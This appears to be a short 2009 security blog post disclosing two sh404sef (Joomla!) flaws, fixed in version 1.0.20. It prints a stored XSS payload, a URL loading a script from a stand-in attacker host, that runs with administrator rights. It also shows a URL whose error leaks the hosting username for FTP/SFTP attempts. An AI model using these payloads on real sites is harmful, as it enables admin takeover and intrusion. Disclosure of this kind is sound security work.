jeffchannell.com

sh404sef URI XSS Vulnerability

Posted in Joomla!
2009-06-08 22:01:58 +0000 UTC

Not too long ago, while doing some routine pentesting of my site, I came across two vulnerabilities in the Joomla! component sh404sef.

The first exploit allowed for scripts to be run in the administrator side of the site by sending specially crafted requests to a site running sh404sef.

http://vulnerable.com/<script src=http://badsite.com/evil.js></script>

Once this is done, any administrator that visits the URL Manager and looks at the 404 Errors will end up executing this script with rights equal to the admin. I leave it as an exercise to the reader to figure out the next step.

The second vulnerability I found is pretty simple, and is only useful for reducing the amount of effort needed for further penetration. By visiting the url:

http://vulnerable.com/index.php?option=com_sh404sef

... an attacker is presented with an interesting error:

Fatal error: Class 'sef_sh404sef' not found in /home/****/public_html/administrator/components/com_sh404sef/sh404sef.class.php(3203) : eval()'d code on line 1 

This gives an attacker the real user name of the user on the host, most useful for attempts at gaining FTP or SFTP access.

These vulnerabilities are fixed as of version 1.0.20 Beta Build 237

Timeline